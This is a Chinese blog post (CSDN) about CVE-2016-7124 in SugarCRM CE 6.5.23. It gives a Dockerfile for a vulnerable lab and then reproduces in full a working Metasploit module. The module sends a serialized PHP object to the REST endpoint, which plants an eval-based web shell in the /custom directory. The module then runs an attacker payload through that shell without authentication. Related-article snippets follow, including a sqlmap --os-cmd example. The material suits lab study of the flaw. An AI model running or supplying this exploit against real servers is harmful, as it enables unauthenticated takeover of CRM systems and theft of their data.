vuln - SugarCRM 6.5.23 - REST PHP Object Injection Exploit

最新推荐文章于 2022-09-28 17:54:24 发布
最新推荐文章于 2022-09-28 17:54:24 发布
阅读量1.2k 收藏
点赞数
分类专栏: Vulnerability Analysis php Pentesting
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nixawk/article/details/52544125
版权

Deploy a vuln lab

Please install docker yourself.

#!/bin/bash

docker build -t sugarcrm:CVE-2016-7124 -f Dockerfile .
docker run -p 3306:3306 -p 80:80 sugarcrm:CVE-2016-7124

sugarcrm

Dockerfile

# docker php tag list
# https://www.seebug.org/vuldb/ssvid-92404
# https://github.com/docker-library/repo-info/blob/master/repos/php/tag-details.md
# http://stackoverflow.com/questions/33795923/how-to-connect-to-mysql-running-on-docker-from-the-host-machine
# http://stackoverflow.com/questions/7739645/install-mysql-on-ubuntu-without-password-prompt

FROM php:5.6-apache

RUN echo "deb http://mirrors.163.com/debian/ jessie main non-free contrib" > /etc/apt/sources.list
RUN echo "deb http://mirrors.163.com/debian/ jessie-updates main non-free contrib" >> /etc/apt/sources.list
RUN apt-get update

RUN echo 'debconf debconf/frontend select Noninteractive' | debconf-set-selections

# Install MYSQL-Server
RUN echo 'mysql-server mysql-server/root_password password password' | debconf-set-selections
RUN echo 'mysql-server mysql-server/root_password_again password password' | debconf-set-selections
RUN apt-get -y install mysql-server


# Install PHP extensions
RUN apt-get install -y libpng12-dev libjpeg-dev wget apt-utils
RUN docker-php-ext-configure gd --with-png-dir=/usr --with-jpeg-dir=/usr
RUN docker-php-ext-install -j$(nproc) mysqli gd zip

# Download and Extract SugarCRM
RUN wget -c -O sugarcrm_dev-6.5.23.tar.gz https://codeload.github.com/sugarcrm/sugarcrm_dev/tar.gz/6.5.23
RUN tar xvf sugarcrm_dev-6.5.23.tar.gz
RUN mv sugarcrm_dev-6.5.23/ /var/www/html/sugarcrm/
RUN chown -R www-data /var/www/html/sugarcrm/

CMD service mysql start && apache2-foreground

Exploit

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'SugarCRM REST Unserialize PHP Code Execution',
      'Description'    => %q{
        This module exploits a PHP Object Injection vulnerability in SugarCRM CE <= 6.5.23
        which could be abused to allow unauthenticated users to execute arbitrary PHP code with
        the permissions of the webserver. The dangerous unserialize() call exists in the
        '/service/core/REST/SugarRestSerialize.php' script. The exploit abuses the __destruct()
        method from the SugarCacheFile class to write arbitrary PHP code into the /custom directory.
      },
      'Author'         => 'EgiX',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['URL', 'http://karmainsecurity.com/KIS-2016-07'],
          ['URL', 'http://www.sugarcrm.com/security/sugarcrm-sa-2016-001'],
          ['URL', 'http://www.sugarcrm.com/security/sugarcrm-sa-2016-008'],
          ['URL', 'https://bugs.php.net/bug.php?id=72663']
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [ ['SugarCRM CE <= 6.5.23', {}] ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jun 23 2016'
      ))

      register_options(
        [
          OptString.new('TARGETURI', [ true, "The base path to the web application", "/sugarcrm/"])
        ], self.class)
  end

  def exploit
    upload_php = '/custom/' + rand_text_alpha(rand(4)+8) + '.php'

    payload_serialized =  "O:+14:\"SugarCacheFile\":23:{S:17:\"\\00*\\00_cacheFileName\";"
    payload_serialized << "s:#{upload_php.length+2}:\"..#{upload_php}\";S:16:\"\\00*\\00"
    payload_serialized << "_cacheChanged\";b:1;S:14:\"\\00*\\00_localStore\";a:1:{i:0;s:55"
    payload_serialized << ":\"<?php eval(base64_decode($_SERVER['HTTP_PAYLOAD'])); ?>\";}}"

    print_status("#{peer} - Exploiting the unserialize() to upload PHP code")

    res = send_request_cgi(
    {
      'uri'    => normalize_uri(target_uri.path, 'service/v4/rest.php'),
      'method' => 'POST',
        'vars_post' => {
          'method'     => 'login',
          'input_type' => 'Serialize',
          'rest_data'  => payload_serialized
        }
    })

    if not res or res.code != 200
      print_error("#{peer} - Exploit failed: #{res.code}")
      return
    end

    register_files_for_cleanup(File.basename(upload_php))

    print_status("#{peer} - Executing the payload #{upload_php}")

    res = send_request_cgi(
    {
      'method'  => 'GET',
      'uri'     => normalize_uri(target_uri.path, upload_php),
      'headers' => { 'payload' => Rex::Text.encode_base64(payload.encoded) }
    })

    if res and res.code != 200
      print_error("#{peer} - Payload execution failed: #{res.code}")
      return
    end
  end
end

References

https://www.exploit-db.com/exploits/40344/
http://paper.seebug.org/39/
https://www.seebug.org/vuldb/ssvid-92404
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2016-7124

Nixawk
关注
专栏目录
SugarCE-6.5.23.zip
03-21
sugarcrm6.5.23版本
php反序列化注入漏洞,SugarCRM v6.5.23 PHP反序列化对象注入漏洞分析
weixin_33188789的博客
03-19 244
Author: p0wd3r (知道创宇404安全实验室)0x00 漏洞概述1.漏洞简介SugarCRM(http://www.sugarcrm.com/)是一套开源的客户关系管理系统。近期研究者发现在其<=6.5.23的版本中存在反序列化漏洞,程序对攻击者恶意构造的序列化数据进行了反序列化的处理,从而使攻击者可以在未授权状态下执行任意代码。2.漏洞影响未授权状态下任意代码执行3.影响版本S...
php 5.6.22 漏洞,SugarCRM v6.5.23 PHP反序列化对象注入漏洞
weixin_34840783的博客
03-19 581
Author: p0wd3r (知道创宇404安全实验室) Date: 2016-09-120x00 漏洞概述1.漏洞简介SugarCRM(http://www.sugarcrm.com/)是一套开源的客户关系管理系统。近期研究者发现在其<=6.5.23的版本中存在反序列化漏洞,程序对攻击者恶意构造的序列化数据进行了反序列化的处理,从而使攻击者可以在未授权状态下执行任意代码。2.漏洞影响未授...
[CRM] SugarCRM-6.5.26 安装中文语言包(CentOS7.4)
Cindy的博客
06-05 1720
SugarCRM语言包安装: 1. 以管理员身份登入SugarCRM,点击最上面的“admin” 2. 找到Developer Tools下的Module Loader 3. 进入Module Loader,上传中文语言包,点击安装 ...
Docker搭建漏洞靶场(Vulhub、Vulnapp、Vulfocus)
HAKUNAMATATATTA的博客
09-28 6172
docker搭建代表性靶场的操作保姆级教程
ThinkPHP-Vuln-master.zip
08-05
本篇文章将聚焦于"ThinkPHP-Vuln-master.zip"这个压缩包中的内容,深入探讨ThinkPHP历史上的几个关键漏洞,帮助开发者理解并防范潜在的安全风险。 1. **远程代码执行(Remote Code Execution, RCE)漏洞** 在...
lcx-vuln.cn.zip
最新发布
08-04
lcx-vuln.cn.zip
java 反序列化利用工具marshalsec-0.0.3-SNAPSHOT-all
12-27
-a:生成exploit下的所有payload(例如:hessian下的SpringPartiallyComparableAdvisorHolder, SpringAbstractBeanFactoryPointcutAdvisor, Rome, XBean, Resin) -t:对生成的payloads进行解码测试 -v:verbose mode...
SugarCRM6.5.X汉化包
11-30
SugarCRM6.5.X的汉化包,兼容SugarCRM6.5全系列.
SugarCRM CE 6.5.20
02-13
SugarCRM CE 6.5.20 开源PHP CRM管理系统
SugarCRM6.5.2的中文包(兼容6.5.X)
03-26
http://www.sugar360.cn/forum.php?mod=viewthread&tid=5055&extra=page%3D1 官方的也出来的,但没此语言包好,官方的有好几个模块没汉化;一些翻译也欠缺。绝无虚假!
js-vuln-db, 一个用于with的JavaScript引擎的Collection.zip
09-17
js-vuln-db, 一个用于with的JavaScript引擎的Collection 基于的JavaScript引擎漏洞案例研究 V8CVE数字特征关键字CVE-2013-6632TypedArray整数 overflow,OOBPinkieCVE-2014-1705TypedArray无效的
【kali】25 漏洞扫描——nmap、smb-vuln-ms10-061.nse(枚举共享打印机)
(∪.∪ )...zzz的博客
10-22 2339
这里写自定义目录标题一、查看脚本,注意categories二、vuln三、smb-vuln-ms10-061.nse查看脚本查看网络中存活的主机使用脚本扫描目标系统的共享打印机 nmap扫描脚本:500+,不同类别 apt-get install ibus ibus-pinyin #安装中文输入法 一、查看脚本,注意categories cat /usr/share/nmap/scripts/script.db categories里说明了脚本的类型 exploit:漏洞利用 二、vuln c
安装SugarCRM 6.5版本
热门推荐
杨江的IT分享专栏
07-28 1万+
环境:CentOS 5.8,安装了Asterisk 1.8升级php到5.2SugarCRM 6.5:  Minimum PHP version required is 5.2.0. You are using PHP version 5.1.6官方的yum源里面没有,如下添加一个额外的源:# rpm  -import http://www.jasonlitka.com/RPM-GPG-KEY-j
记一次对Vulnerable Docker靶机渗透全过程
weixin_34072637的博客
10-01 691
记一次对Vulnerable Docker靶机渗透全过程 Vulnhub它是一个提供各种漏洞环境的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。 今天我主要是使用VMware搭建一个Vulnerable Docker靶机环境,主要是为了练习使用。 完整找出所有flag只是基本任务,实现提权才是终极目标。我并不追求最快夺旗,而...
Vulnhub系列】docker_containement
大方子
10-02 1460
=========================== 个人收获: 1.利用reGeorg+Proxifier进行内网渗透 2.学会wpscan 3.学会了Docker Remote api ============================= 下载地址:https://download.vulnhub.com/vulnerabledocker/ 靶机总共...
18. SQLMAP使用什么参数可以执行系统命令(1.5分) A.--os-shell B.--sql-cmd C. --os-cmd D. --sql-shell
06-13
正确答案是 C. --os-cmd。SQLMap 是一款常用的 SQL 注入工具,可以用于检测和利用 SQL 注入漏洞。在 SQLMap 中,可以使用 --os-cmd 参数执行操作系统命令,该参数用于在漏洞利用过程中获取系统权限或进行后渗透操作。例如,可以使用以下命令执行 whoami 命令:sqlmap -u "http://example.com/vuln.php?id=1" --os-cmd="whoami"。而其他选项中,--os-shell 参数用于获取一个交互式的系统命令 shell,--sql-cmd 参数用于在 SQL 注入漏洞中执行 SQL 语句,--sql-shell 参数用于获取一个交互式的 SQL shell。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值